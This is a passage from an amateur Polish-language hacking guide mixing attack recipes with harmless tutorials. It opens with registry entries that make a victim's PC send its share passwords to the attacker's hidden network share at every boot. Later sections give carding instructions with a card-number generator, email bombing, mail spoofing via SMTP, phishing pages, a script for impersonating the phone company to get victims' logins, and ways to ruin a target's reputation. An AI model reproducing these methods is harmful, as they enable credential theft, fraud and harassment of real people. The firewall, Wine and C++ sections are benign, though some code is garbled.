HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\
Network\\LanMan"
"WinStart2"="if exist \\\\MAX\\TAJNY$\\in.reg regedit.exe /s
\\\\MAX\\TAJNY$\\out.reg"

Po wprowadzeniu zawartości pliku in.reg do rejestru systemowego ofiary pierwsza zmienna:

"WinStart"="regedit.exe /s /e \\\\MAX\\TAJNY$\\out.reg
HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion
\\Network\\LanMan"

sprawi, że zawsze przy starcie systemu na komputerze ofiary Windows zapisze całą konfiguracje udostępnionych folderów i drukarek w pliku out.reg na naszym dysku. Jeżeli w tym czasie udział

\\MAX\TAJNY$
nie będzie dostępny (np. jeżeli nasz komputer będzie wyłączony) wówczas start systemu opóźni się o około 1 sekundę. Zapis drugiej zmiennej jest trochę bardziej skomplikowany:

"WinStart2"="if exist \\\\MAX\\TAJNY$\\in.reg regedit.exe /s
\\\\MAX\\TAJNY$\\in.reg"

Podobnie jak w przypadku pierwszej zmiennej zawsze, gdy system będzie ładowany zostanie uruchomiony program regedit.exe i wprowadzi do rejestru systemowego ofiary zmienne znajdujące się w pliku in.reg na naszym dysku. Jednakże tutaj jest to trochę bardziej skomplikowane. Gdy program nie znalazłby pliku in.reg (np. gdy będziemy mieli wyłączony komputer) na ekranie komputera ofiary pojawiłby się komunikat o błędzie. Aby tego uniknąć przed uruchomieniem regedit.exe konieczne jest sprawdzenie czy istnieje taki plik. Dlatego wartość zmiennej ma postać:

if exist nazwapliku polecenie
Teraz, gdy tylko będziemy chcieli wprowadzić jakieś zmiany w konfiguracji udostępnionych folderów w komputerze ofiary wystarczy przygotować odpowiedni plik in.reg, przegrać go do folderu, który udostępniamy - TAJNY$ i poczekać, aż użytkownik w sieci włączy komputer, bądź zrestartuje system. Wówczas także będziemy mogli odczytać zapis konfiguracji udostępnionych folderów, a co za tym idzie - hasła, które po starcie systemu znajdą się w pliku out.reg, na naszym dysku. Trzeba jednak pamiętać o tym, że istnieje program "Monitor sieci", który pokazuje wszystkie komputery w sieci podłączone do zasobów określonego kompa. Niestety to nie jest moje ale dam link.


Cracking

a) Podstawy

Po pierwsze znac Assembler, nie koniecznie perfekcyjnie, ale im lepiej go poznasz i zrozumiesz tym latwiej bedziesz lamal
zabezpieczenia, i tym lepszym bedziesz crackerem. Oczywiscie musisz byc "zaznajomiony" z takimi pojeciami jak np. Rejestr, flaga, przerwanie (INT - raczej tylko pod DOS), segment, offset, liczby hexadecymalne itp. itd. ... Z polecen assemblera
najczesciej uzywane to : CMP (porownuje dwie wartosci) ; TEST (podobne do poprzedniego) ;
rozne odmiany skoku - JMP , Jx , Jxx ; CALL (wywolanie procedury) ; INT (przerwanie - pod DOS) ; NOP (nic) itp. itd.
b) Miec intuicje :)
c) Przydalo by sie poznac jakiegos doswiadczonego crackera i tam
kierowac swoje pytania i problemy.
d) Dobrze by bylo znac angielski - wiekszosc (czyt. wszystkie) FAQ sa napisane wlasnie w tym jezyku. Jesli go nie znasz ...
ucz sie czym predzej !

b) Przegląd faq

POLECAM :

Serie faq mNICHA (crack 1,2,3,4,5)
Crack in Java - dobry faq



c) Dissembler

Dssembler jest to program coś w rodzaju Assemblera ale ma zastosowanie odwrotne dzięki temu możemy rozłożyć każdy program na kod źródłowy oczywiście assemblerowy. Oto okno jednego z dissemblera pod windowsa :



d) Opisy programów

SoftICE
Jest to debugger ktory pozwala ci sledzic wykonywanie sie programu
instrukcja po instrukcji w ASM ... Kazdy program obojetnie w jakim
jezyku wysokiego poziomu jest napisany np. C++ , Pascal , VBasic
musi byc przetlumaczony na ASM a potem na liczby hexadecymalne a
potem jeszcze na binaria.
Wiec w debuggerze pracujemy na poziomie ASM (aczkolwiek sa tez
przedstawione te instrukcje asm (mnemoniki) w postaci hexadecymalnej
SoftICE podczas instalacji dopisze
do autoexec.bat linijke dzieki ktorej bedzie
sie wczytywac do pamieci jeszcze przed uruchomieniem SHIT95.
Ta linijka to (jakbys przypadkowo ja wykasowal :)) :
DRIVE:\PATH\WINICE.EXE (DRIVE to litera dysku , PATH sciezka of coz).
Jak juz SHIT95 sie uruchomi to uaktywniamy SoftICE-a przez wcisniecie
Ctrl+D. I juz jestesmy w Debuggerze...

Disassembler

... najlepszy pod SHIT98 to
W32DASM . Jest tez inny ciekawy - Sourcer 7.0 ktory wstawia swoje komentarze
do disassemblowanego pliku. Taki zdiassemblowany plik mozna od
razu skompilowac w TASM lub MASM (kompilatory Assemblera).


Dodatek :

a) Fake Mail -czyli fałszywy list

Jak chcesz wysłać komuś z Outlloca fałszywego to robisz tak. Masz jakieś konto teraz dajesz narzędzia->konta->poczta i właściwości. W polu nazwa wpisujesz byle co. W polu e-mail wpisujesz co chcesz np. root@wp.pl i to wszystko teraz możesz z niego wysyłać fałszywe e-maile, ale w nagłówku będzie twój IP.

b) BomB E-mail

Jest to zapchanie czyjeś skrzynki wysyłając kilkaset e-mailów o tej samej treści. Do tego służy np. Listonosz fajny program można go ściągnąć z

c) Anonimowość

Jak chcesz być anonimowy to ustaw sobie serwer proxy. Oto kilka linków :

http://www.multiproxy.org/env_check.htm
http://soldierproxy.s5.com/CurrentList.htm

d) IRC

Oto kilka serwerów IRC na mojej stronie jest bramka IRC

IRC.PL
warszawa.irc.pl:6667
wroclaw.irc.pl:6665-6667
krakow.irc.pl:6667,6665
poznan.irc.pl:6661-6667 (217.99.169.70)
lublin.irc.pl:6667,7776
polska.irc.pl:6666

IRCX.PL
poznan.ircx.pl:6667
bielawa.ircx.pl:6667
wroclaw.ircx.pl:6667

IRCZONE.PL
poznan.irczone.pl:6667
irc.irczone.pl:6667
alfa.irczone.pl:6667
zgora.irczone.pl:6667
krakow.irczone.pl:6667
koszalin.irczone.pl:6667
gdansk.irczone.pl:6667
bialystok.irczone.pl:6667

BOO
boo.pl:6667
irc.boo.pl:6667
bytom.boo.pl:6667
krakow.boo.pl:6667
bialystok.boo.pl:6667
radzionkow.boo.pl:6667

IRC 4 EVER
alpha.IRC4ever.net:6667
hub.IRC4ever.net:6667
proxima.IRC4ever.net:6667
neptun.IRC4ever.net:6667
auriga.IRC4ever.net:6667
atena.IRC4ever.net:6667
alpha.provector.net:6667

PolNet
warszawa.ircnet.pl:6666 do 6669 oraz 7000
krakow.ircnet.pl:6667-6668
poznan.ircnet.pl:6667:6668
torun.ircnet.pl:6667
rzeszow.ircnet.pl:6667
bialystok.ircnet.pl:6667

HOMEIPnet
krakow.homeip.net:6667
bydgoszcz.homeip.net:6667
hub.homeip.net:6667
stargard.homeip.net:6667
nowysacz.homeip.net:6667
braniewo.homeip.net:6667
gdansk.homeip.net:6667

EFNET.PL
irc.efnet.pl:6667

FORGENET
southpark:6667
pl-opers.net:6667
mafia.irchacks.com:6667
cordec.cjb.net:6667
serwer.infinity.net.pl:6667

NetFriend
leszno.ircd.pl:6667
warszawa.ircd.pl:6667
poznan.ircd.pl:6667
wroclaw.ircd.pl:6667
wroclaw.ircd.pl:6667
lublin.ircd.pl:6667
proxima.ircd.pl:6667
platon.ircd.pl:6667
virtuo.ircd.pl:6667


ŚWIAT

DALNET
raptor.dal.net:6661,6662,6663,7000
irc.dal.net:7000
stlouis.dal.net:6665,6666,6667,7000
marvin.dal.net:6668,6669,7000
vogon.dal.net:6668,6669,7000
defiant.dal.net:7000,7001,7002,7003
scorpion.dal.net:6661,6662,6663,7000
davis.dal.net:6668,6669,7000
cyberverse.dal.net:6667,7000
voyager.dal.net:6666,6667,6668,6669,7000
spider.dal.net:6668,6669,7000,7777
mindijari.dal.net:6667,6668,6669,7000
centurion.dal.net:6668,7000,7500
hebron.dal.net:6661,6662,6663,7000
xgw.dal.net:6668,7000
uncc.dal.net:6667,6668,6669,7000
barovia.dal.net:6661,6662,6663,7000
glass.dal.net:6667,7000
webzone.dal.net:6664,6665,6668,7000
durham.dal.net:7000,7001,7002
irc.eu.dal.net:7000

EFNET
elk.nstn.ca:6667
irc.cadvision.ab.ca:6667
irc.mcgill.ca:6667
irc.cs.mun.ca:6667
irc.magic.mb.ca:6667
portal.mbnet.mb.ca:6667
irc2.magic.ca:6667
irc.vianet.on.ca:6667
irc.polymtl.ca:6667
irc.yorku.ca:6667
irc02.irc.aol.com:6667
irc2.blackened.com:6667
irc.cris.com:6667
irc.neosoft.com:6667
irc-1.netcom.com:6667
irc-2.netcom.com:6667
irc-3.netcom.com:6667
irc2-1.netcom.com:6667
irc2-2.netcom.com:6667
irc2-3.netcom.com:6667
irc.primenet.com:6667
irc.psinet.com:6667
irc.voicenet.com:6667
irc.ecn.bgu.edu:6667
azure.acsu.buffalo.edu:6667
irc.calpoly.edu:6667
irc.colorado.edu:6667
organ.ctr.columbia.edu:6667
red-dwarf.cit.cornell.edu:6667
irc.law.emory.edu:6667
irc.cnde.iastate.edu:6667
irc.ilstu.edu:6667
irc-2.mit.edu:6667
irc.pitt.edu:6667
irc.cs.rpi.edu:6667
irc.rutgers.edu:6667
irc.stanford.edu:6667
anarchy.tamu.edu:6667
irc.ucdavis.edu:6667
irc.uci.edu:6667
irc.uiuc.edu:6667
pegasus.ccs.itd.umich.edu:6667
irc.umn.edu:6667
piglet.cc.utexas.edu:6667
becker1.u.washington.edu:6667
irc.eng.yale.edu:6667
efnet.evitech.fi:6667
irc.ais.net:6667
irc3.ais.net:6667
irc.best.net:6667
opus.bridge.net:6667
irc.cdc.net:6667
irc.cerf.net:6667
irc.digex.net:6667
irc.frontiernet.net:6667
irc.gate.net:6667
noc.tor.hookup.net:6667
irc.ionet.net:6667
irc.mcs.net:6667
irc.mo.net:6667
irc.nol.net:6667
irc.phoenix.net:6667
ircd.texas.net:6667
irc.homelien.no:6667
eff.org:6667
irc.io.org:6667
irc.sintercom.org:6667
irc.gd.gu.se:6667
irc.ipro.se:6667
irc.csie.nctu.edu.tw:6667
irc.csie.ncu.edu.tw:6667
irc.nsysu.edu.tw:6667

IrCQ (IRC na serwerach ICQ)
irc01.icq.com:6667
irc02.icq.com:6667
irc03.icq.com:6667
irc04.icq.com:6667

PROSTAR
irc.webmaster.com:6667
irc.wugnet.com:6667
irc.slinknet.com:6667
irc.prostar.com:6667
irc.progressive-data.com:6667
irc.pdcomp.com:6667
irc.hko.net:6667
irc.accesscom.net:6667
irc.webzone.net:6667
irc.super-highway.net:6667
irc.spitfire.net:6667
irc.net-magic.net:6667
irc.mwweb.com:6667
irc.linkline.com:6667
irc.chariot.net.au:6667
irc.centralnet.net:6667
irc.bright.net:6667

UNDERNET
ca.undernet.org:6667
eu.undernet.org:6667
irc.ucdavis.edu:6667
irc.ucdavis.edu:6669
austin.tx.us.undernet.org:6667
ann-arbor.mi.us.undernet.org:6667
manhattan.ks.us.UnderNet.org:6667
blacksburg.va.us.undernet.org:6667
london.uk.eu.Undernet.org:6667
montreal.qu.ca.undernet.org:6667
norman.ok.us.undernet.org:6667
phoenix.az.us.undernet.org:6667
rochester.mi.us.undernet.org:6667
stLouis.mo.us.UnderNet.org:6667
toronto.on.ca.undernet.org:6667
vancouver.bc.ca.undernet.org:6667
washington.dc.us.undernet.org:6667
okc.ok.us.undernet.org:6667
sanJose.ca.us.Undernet.Org:6667
baltimore.md.us.undernet.org:6666,6667,6668,6669

CHATNET
walnutcreek.ca.us.chatnet.org:6667
sf.ca.us.chatnet.org:6667
rockkill.sc.us.chatnet.org:6667
tupelo.ms.us.chatnet.org:6667
portland.or.us.chatnet.org:6667
losangeles.ca.us.chatnet.org:6667
chatworld.chatnet.org:6667
k9.chatnet.org:6667
slc.ut.us.chatnet.org:6667

GALAXYNET
atlanta.ga.us.galaxynet.org:6667
phantasy.us.galaxynet.org:6667
wustl.us.galaxynet.org:6667
chicago.il.us.galaxynet.org:6667
txdirect.us.galaxynet.org:6667
axis.us.galaxynet.org:6667
provo.ut.us.galaxynet.org:6667
honolulu.hi.us.galaxynet.org:6667
winternet.us.galaxynet.org:6667
sprynet.us.galaxynet.org:6667
gainesville.fl.us.galaxynet.org:6667
stlouis.mo.us.galaxynet.org:6667
punx.us.galaxynet.org:6667
madison.wi.us.galaxynet.org:6667
charlotte.nc.us.galaxynet.org:6667
bryan.tx.us.galaxynet.org:6667
Kauai.hi.us.galaxynet.org:6667
hilo.hi.us.galaxynet.org:6667
eee.ntu.sg.galaxynet.org:6667
ntu.sg.galaxynet.org:6667
pacific.sg.galaxynet.org:6667
destiny.uk.galaxynet.org:6667
borgdice.de.galaxynet.org:6667
mirage.uk.galaxynET.org:6667
gymnet.us.galaxynet.org:6667
sedona.az.us.galaxynet.org:6667
washington.us.galaxynet.org:6667
bocanet.us.galaxynet.org:6667
clever.us.galaxynet.org:6667
castlegate.us.galaxynet.org:6667
vancouver.bc.ca.galaxynet.org:6667
vader.us.galaxynet.org:6667
fortworth.tx.us.galaxynet.org:6667

NEWNET
irc.chelmsford.com:6667
irc.eskimo.com:6665,6666,6667
irc.ef.net:6667
irc.cnet-nuisance.com:6667
irc.dragon.org:6667
irc.sprintlink.co.za:6667

JUNKNET
lowell.ma.us.undernet.org:6667
portland.me.us.undernet.org:6667
toronto.on.ca.undernet.org:6667
norman-r.ok.us.undernet.org:6667
dallas.tx.us.Undernet.org:6667
chicago-r.il.us.Undernet.org:6667
springfield.mo.us.undernet.org:6667

IRCNET
irc.gate.net:6667

MSN (MICROSOFT)
mschat.msn.com:6667
publicchat.msn.com:6667
ubchmsnb01:6667

INNERNET
irc.starlink.it:6667
irc.mit.edu:6667

e) Budowa Firewalla

Firewall to program (ew. urzadzenie) zapobiegajacy nieautoryzowanemu dostepowi do twojego komputera. Przedstawie tutaj sposob na zbudowanie prostej zapory, czyli firewalla, oczywiscie pod Linuxa. W tym celu uzyje programu ipchains sluzacego do filtrowania pakietow IP (Internet Protocol), ktore sa podstawa Internetu.

1) Troche wstepu

Ipchains komunikuje sie z jadrem linuxa w celu filtrowania pakietow. Kazdy pakiet zawiera naglowek (header) i tresc (body). Filtracja pakietow polega na przeanalizowaniu naglowka i podjeciu odpowiedniej akcji (przepuszcza albo odrzuca). Istnieje pewna lista zasad i regul zwanych lancuchami (chains). Sa trzy rodzaje lancuchow: input, output, forward. Gdy pakiet wchodzi poprzez odpowiedni interfejs sieciowy, wtedy jadro uzywa lancucha input w celu okreslenia co z nim dalej zrobic. Jezeli ten pakiet nie zostanie odrzucony, jadro decyduje dokad go dalej przeslac- uzywany jest wtedy lancuch forward. Gdy pakiet ma byc przeslany na zewnatrz, wtedy jadro sprawdza lancuch output.

2) Zarzadzanie firewallem

Polega ono na zmienianiu regul za pomoca programu ipchains. Kilka komend:

ipchains -L lancuch #wyswietla reguly dla podanego lancucha (jezeli nie podamy interesujacego nas lancucha, wtedy zostana wyswietlone reguly dla wszystkich lancuchow)

ipchains -ML #wyswietla reguly zwiazane z maskowaniem adresow

ipchains-save #zapamietuje aktualne ustawienia firewalla (mozna ja zapisac jako plik i wykorzystac w skrypcie uruchamiajacym firewalla)

ipchains-restore #przywrocenie konfiguracji firewalla

3) Parametry ipchains

Oczywiscie jak wiadomo nalezy je wpisywac po uprzednim wpisaniu "ipchains".

-A - dodanie reguly lub kilku regul
-D - usuniecie reguly lub kilku regul
-R - wymiana okreslonej reguly w lancuchu
-I - wstawia regule w okreslonej pozycji w lancuchu
-L - wypisuje liste wszyskich regul (we wskazanym lancuchu lub wszystkich)
-F - skasowanie wszystkich istniejacych regul z lancucha
-Z - zerowanie licznikow bajtow we wszystkich regulach lancucha
-N - tworzy nowy lancuch (o okreslonej nazie)
-P - ustawia domyslne zabezpieczenia dla wbudowanych lancuchow
-M - lista aktualnie maskowanych polaczen
-c - sprawdza okreslony pakiet na dzialanie lancucha
-h - pomoc
-X - kasuje pusty lancuch

Parametry:

-p nazwa_protokolu - okresla sprawdzany protokul pakietu (tcp, udp, icmp, all)
-s adres [port} - okresla zrodlo pakietu (zmienna adres moze byc adresem IP lub nazwa hosta)
-d adres [port] - okresla docelowy adres pakietu
-j cel - informuje o tym, co zrobic z pakietem:

ACCEPT - przepuszcza pakiet
DENY - odrzuca pakiet nie informujac nadawcy o jego odrzuceniu
REJECT - odrzuca pakiet informujac nadawce o jego odrzuceniu
MASQ - maskowanie adresow IP
REDIR - przekierowanie pakietu

-i nazwa - okresla nazwe interfejsu do lub z ktorego pakiet bedzie otrzymywany/wysylany

4) Budujemy prosty firewall

Oczywiscie bedzie to baaaaardzo prosty firewall. Trzeba utworzyc dwa pliki (skrypty). Pierwszy uruchamiajacy i drugi zatrzymujacy firewalla.

a) Utworz plik i nazwij go firewall.on. Umiesc go w katalogu usr/local/bin (oczywiscie musisz byc zalogowany jako root). Oto tresc pliku:

#!/bin/bash
echo Uruchomienie zapory

#Kasujemy wszystkie dotychczasowe reguly oraz puste lancuchy
ipchains -F
ipchains -X

#Ustawiamy domyslne zabezpieczenia na odmowienie uslugi (zawsze w ten sposob #rozpoczynaj budowe zapory; znacznie zwieksza bezpieczenstwo)

ipchains -P input DENY
ipchains -P output DENY
ipchains -P forward DENY

#Usuwamy zakazy na interfejs loopback (korzystaja z niego niektore uslugi)

ipchains -A input -s 127.0.0.1 -j ACCEPT
ipchains -A output -s 127.0.0.1 -j ACCEPT

#Teraz mozemy udostepnic takie uslugi jak FTP czy telnet, ja dla przykladu #udostepnie telnet czyli port 23, FTP (port 21) bedzie zamkniete dla #wszystkich, ktorych IP jest rozne od 127.0.0.1

ipchains -A input -p tcp -s 0.0.0.0/0 -d 0.0.0.0/0 23 -j ACCEPT
ipchains -A output -p tcp -s 0.0.0.0/0 -d 0.0.0.0/0 23 -j ACCEPT

b) Utworz plik i nazwij go firewall.off. Umiesc go rownierz w usr/local/bin.
Tresc jest nastepujaca:

#!/bin/bash
echo Zatrzymywanie zapory

#Kasujemy wszelkie reguly i lancuchy ustawione przez uzytkownika

ipchains -F
ipchains -X

#Ustawiamy domyslna akceptacje wszelkich pakietow

ipchains -P input ACCEPT
ipchains -P output ACCEPT
ipchains -P forward ACCEPT

c) Teraz ustawiamy prawa do uruchamiania tych plikow (oczywiscie jako root):

chmod 770 /usr/local/bin/firewall.*

d) Po podlaczeniu do Internetu uruchamiamy firewalla komenda "firewall.on" (mozna to zrobic tylko z poziomu roota)

J) Uruchamiamy pliki windows spod linuxa

1.Zaczynamy od uruchomienia terminala. W oknie terminala wpisujemy polecenie

[voyager@fw2 voyager] $ Su
password:
[root@fw2 voyager]# ...

naciskamy enter, wpisujemy hasło administratora i ponownie naciskamy enter.

2.Tworzym katalog w którym zamontujemy partycje windows, wpisując polecenie mkdir /mnt/windows i naciskamy enter.

3.Montujemy partycje windows wpisując polecenie mount /dev/hda1 /mnt/windows i naciskamy enter. Opuszczamy konto roota, wpisując polecenie exit i naciskamy enter. Wpisujemy wine/mnt/windows/windows/sol.exe i naciskamy enter.

4.Gdy na ekranie pojawi się komunikat [wineserwer: chdir /home/voyager/.wine : Non such file or directory] utwórzmy brakujący katalog. Wpisujemy mkdir .wine i naciskamy enter, a potem ponownie
wine/mnt/windows/windows/sol.exe i jeszcze raz naciskamy enter. Życze miłej zabawy !!!

C/C++

a) Info


Język C++ jest uniwersalnym, nowoczesnym językiem programowania.
Stosowane przez USA i inne kraje wobec Polski wieloletnie
embargo COCOM'u (przeszkody w dostępie do nowoczesnej
technologii) sprawiły m. in., że popularność OS2, UNIXa i C/C++
jest w Polsce do dziś nieproporcjonalnie mała, a Basica, Pascala
i DOSa nieproporcjonalnie duża. W USA C++ już od kilku lat
stanowi podstawowe narzędzie programistów

b) Kurs

Oto mój kurs.
Język C/C++ są głównym narzędziem programistycznym na całym świecie, więc polecam ci go się uczyć. Ja sam dopiero się ucze tego wspaniałego języka. Na początek polecam ci ściągnięcie Dev C++. Teraz spróbuj napisać pierwszy program. Oto kod :

Program 1

#include <-główna funkcja
main() <-zawsze przy uruchamianiu program najpierw czyta tą funkcje
{
printf("Program jest lamerski");<-wyświetla napis
}

Program 2
#include
main()
{
printf("Program by Spinacz");
getchar();<-czeka aż wciśniesz enter i się wyłącza
}

Program 3
#include <-funkcja główna

void main()
{
int a, b, c; <-definiuje zmienne liczb całkowitych
a=5;
b=10;
c=a+b;
cout << "Wartość zmiennej c="< getchar();<-czeka aż wciśniesz enter i się wyłącza
}

U mnie na stronie będą kody źródłowe

c) Komplikatory

Programy :

Turbo C http://maly_brat_ii.w.interia.pl/Turbo_C.zip
Dev-C++ http://download.chip.pl/download_1878.html
Borland C++ - tworzy 32 bit aplikacje oj sorry nie mam linku, bo program trochę zajmuje
Osobiście polecam Dev-C++ to poprostu wypas.
Oto okno Dev-C++



Jest łatwy w użyciu. Zajmuje 7.89 MB ale warto go ściągnąć. Proponuje ci go ściągnąć przez Getright (1 godzina) Bez (2.50 godziny) więc jest różnica. Okno jest ładne i estetyczne. Może komplikować zarówno programy C jak i C++ (widać to na obrazie. Wszystko jest z tym programem łatwe.

Carding

a) Info

Carding-dziedzina sztuki która zajmuje sie korzystaniem z cudzej katy aby zdobyć dobra materialne.

W tej dziedzinie raczej podstaw nie potrzebujesz, chyba nie trzeba się uczyć jak kradnie się karty kredytowe ale tu przedstawie kilka kart


VISA Classic 4XXX XXX XXX XXX
VISA Gold 4XXX XXXX XXXX XXXX
Mastercard 5XXX XXXX XXXX XXXX
Discovercard 6XXX XXXX XXXX XXXX
American Express 37XX XXXXXX XXXXX
American Express Gold 3XXXXX XXXXXXXX XXXXXXX
Carte Blanche 38XXX XXXX XXXXX
DinersClub 3AXX XXXXXX XXXX
Eurocard 5XXX XXXX XXXX XXXX
JCB 35XX XXXX XXXX XXXX

b) Co za to grozi

Carding jest nielegalny i za to możesz iść siedzieć na 5 lat może i wiecej jak cię złapią to jeszcze zabulisz kilka tysiaków grzywby więc nie daj się złapać.

c) generatory + opis

OPIS BY SMALL BROTHER

(Wybieramy Klawiatura)
I - Informacje O Programie
S - Setup :)
G - Tu Generuje Sie Numery Kart Kredytowych
V - Uprawomacnia Liczbe Kart / Robi Nie Wazny Numer Karty
E - Ekstrapoluje nowe karty z istniejacej karty
O - Produkuje Klucz PGP Do Pliku
Q - Wyjscie Do Windows/Dos

No To Tak Teraz Male Co Nie Co ;) (Moze Takze Wcisnac F - Czyli Szukanie)Wciskasz G I Piszesz Np 4402 (Visa), Pózniej Program Cie Za Pyta O Dlugosc Karty Wpiszesz Ile Ci Tam Odpowiada Enter I Na Koncu Za Pyta Cie Ile Chcesz Kart Od 0 Do 999 Wpisz I Enter I Gotowe!

Moja Ocena 8/10
Jak Cos Sie Nie Zgadza to pisz do Małego Brata


WINDOWS (Shita)

a) Rejestr

Chyba nie musze pisac co to jest rejestr tego jest pełno np. WIN FAQ ale dobrze napisze w skrócie jak chcesz go uruchomić to start-uruchom-regedit. Rejest jest to coś w rodzaju serca windowsa. Jest tam zapisywane wszystko jakie gry są zainstalowane itp. Jak coś zmieniasz w rejestrze to zawsze rób kopie zapasową. Dzieki niemu możemy zhackować sobie windowsa.

A tu przedstawiam kilka sztuczek, które dostałem od jfkennedy-ego
Zmiany i zabezpieczenia

a) blokada elementow systemu wartosci binarne 1
HKEY_USERS\Default\Software\Microsoft\Windows\CurrentVersion\Policies

EXPLORER

Norun.................................Uruchom
NoSetFolders..........................Panel sterowania
NoSetTaskbar..........................Wlasciwosci paska
NoFind................................Znajdz
NoNetHood.............................Otoczenie sieciowe
NoDesktop.............................Pulpit
NoSaveSettings........................Ulozenie ikon

SYSTEM

DisableRegistryTool...................Rejestr
NoDispCPL.............................Właściwości ekranu
NoDevMgrPage..........................System-> menadżer urządzeń
NoSecCPL..............................Hasła

NETWORK

NoEntireNetwork.......................Cała sieć
NoWorkgroupContents...................Grupy robocze
NoNetSetup............................Właściwości sieci
HideSharePwds.........................Hasła w gwiazdki
NoDialIn..............................Brak możliwości odbierania tel.
NoPrintSharing........................Udostępnianie drukarek

._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._

b) Dodawanie komponentów do paska start

Panel sterowania.{21EC2020-3AEA-1069-A2DD-08002B30309D
Kosz.{645FF040-5081-101B-9F08-00AA002F954E}

c) Usuwanie komponentów z paska start

._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._
HKEY_CURRENT_USER\Software\Microsoft\Windows\Current Version\Policies\Explorer
nowe wartości binarne o nazwach:

NoFavoritesMenu
NoFind
NoRecentDocsMenu
NoLogOff
ClearRecentDocsOnExit
NoRun
Noclose
._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._.

d) Dodawanie komponentów do paska właściwości plików i katalogów

HKEY_LOCAL_MACHINE\Software\CLASSES\Directory\shell tworzymy klucz o nazwie programu
a w nim kolejny o nazwie command. Klikamy dwukrotnie domyślna i wpisujemy ścieżkę
dostępu programu.

._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._.

e) Informacje wyświetlane w menu kontekstowym zawarte są w kluczu HKEY_CLASSES_ROOT
każdego rozszerzenia z osobna. Pojedyncze zdarzenia, zwane również słowami kanonicznymi,
przechowywane są w podkluczu shell każdej definicji klas. Standardowo Windows rozpoznaje
następujące słowa kanoniczne:

open - nazwa menu: Otwórz
openas - nazwa Otwórz z
print - Drukuj
find - Znajdź
explore - Eksploruj

Domyślna nazwa menu może zostać zmieniona poprzez wpisanie wybranej przez nas nazwy w
polu wartości domyślnej danego zdarzenia.

._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._.

f) Prawie każde rozszerzenia ma przypisany program, w którym ma być otwarte np. Klikając
na plik o rozszerzeniu txt otwiera się Notatnik. Informacje na temat wszystkich rozszerzeń
plików i przypisanych nim zdarzeń zapisane są w kluczu HKEY_CLASSES_ROOT. Jeżeli dane
rozszerzenie nie ma przypisanego zdarzenia zostaje wywołana procedura domyślna zawarta
w podkluczu *. Wszystkie informacje o domyślnych ikonach danych rozszerzeń zawarte są
w podkluczach definicji klas w podkuluczach DefaultIcon.

._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._.

g) Ukrywanie elementów panelu sterowania

- usunąć wszystkie pliki o rozszerzeniu cpl
- w pliku control.ini w pierwszej linijce tj.[Don’t load] znajdują się wszystkie
niepotrzebne programy uznane za zbędne do wyświetlania wystarczy dopisać jeden z
plików do lini ze znakiem "=yes"

._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._.

Oczyszczanie systemu win98/mE

Aby system zajmował mniej miejsca warto usunąć wiele niepotrzebynch śmieci, poniżej
przedstawiam listę katalogów i plików, których NIE wolno usuwać. Całą resztę możemy
spokojnie przenieść do kosza.

C:\

autoexec.bat | command.com | config.sys | io.sys | msdos.sys

Windows:\

command | fonts | inf/other | installer | java | menu start
pulpit | sendto | sysbckup | system/iosubsys | system32 | temp

ROZSZERZENIA KTÓRE MOŻNA USUNĄĆ

*.* old | *.* bak | *.* spc | *.* 000, 001, 002 | *.* prv | *.* txt
*.* tmp| *.* bmp | *.* pcx | *.* ani | *.* hlp | *.* mid | *.* rtf
*.* scr | *.* wav | *.* wri | *.* pif

Katalog TEMP warto reguralnie opróżniać, również z katalogu FONTS można trochę usunąć.

._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._

Anonimowy mail

Procedura wysyłania kiczu:

a) Telnetuj sie na 25 port wybranego serwera SMTP np. telnet smtp.o2.pl 25
b) Przywita nas jakiś text powitalny wyświetlający wersję sendmaila
c) Nastepnię:

HELO (uaktywnia serwer)
MAIL FROM: adres z którego wysylamy wiadomosc
RCPT TO: adres do krórego wysylamy wiadomosc
DATA wpisujemy zawartosc wiadomosci
. konczy i wysyla wiadomosci
QUIT rozlacza sie z serwerem

Outlook Experss

Narzedzia -> Konta -> Poczta (usuwamy wszystko) Dodaj-> Poczta tworzysz nowe konto
to wpisujesz pop3.o2.pl i smtp.o2.pl. Nastepnie wybieramy wlasciwosci i do dziela:

NAZWA: twoja xywa (podpis)
ORGANIZACJA: wedle uznania
ADRES E-MAIL: falszywy adresik (bill@microsoft.com)
ADRES ZWROTNY: wedle uznania bzdety to co wyzej

Nasze ip pojawia się w szczegółach dlatego warto używać remailerów, które przetrzymują
nasz list i wysyłają od siebie z innego ip adres http://hyperreal.info/cypher/remailer

._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._._

Pozyskiwanie informacji

W celu zbierania wszelkiej maści informacji można potworzyć kilka stronek internetowych
z logowaniem na wstępie wymagane do wejścia na stronę jest podanie m@ila i hasła.
Ciekawe kto poda ?

Wysyłamy fuckmaila do znienawidzonego lamera treści: Informujemy Sz.P, że w ostatnim
czasie łączył się P. przez płatny serwer xlaha 4,70 zł/min i rachunek za usługi
internetowe wynosi 2,600 zł. Prosimy o kontakt w celu zweryfikowania danych itp.
Z powagą TPSA.

Dzwonimy do gościa przedstawiamy się jako TPSA wstawiamy bzdury w rodzaju awarii,
zmianie kont czy innych kosmicznych banałach. Najważniejsze jest aby było wiarygonie,
można oczywiście postukać w klawiaturę. "Prosimy o podanie pana, logina hasła i numeru
IP przydzielonego przez firmę ". Jeśli gość nie skuma to wszystkie te dane są na
papierku danym przez TP przy montowaniu. Dziękuję prosimy jeszcze o kontakt m@ilem
bez podpisu na adres...

Jeśli nie znamy namiarów kolejnej ofiary a chcemy się dowiedzieć szukamy jej znajomych.
Najłatwiej się kręci facetów więc darmowe konto kasiaxxx będzie pasowało, wysyłamy
liścik do znajomego ofiary i prosimy grzecznie o namiary. To nie wyjdzie za pierwszym
razem lepiej trochę poflirtować i w ps poprosić o adres.

Kolejnym sposobem na zniszczenie znienawidzonego lamerka są dość brutalne metody.

a) rozsyłamy fakmailem z jego konta bluzgi do jego znajomych tak aby zachwiać jego reputację.
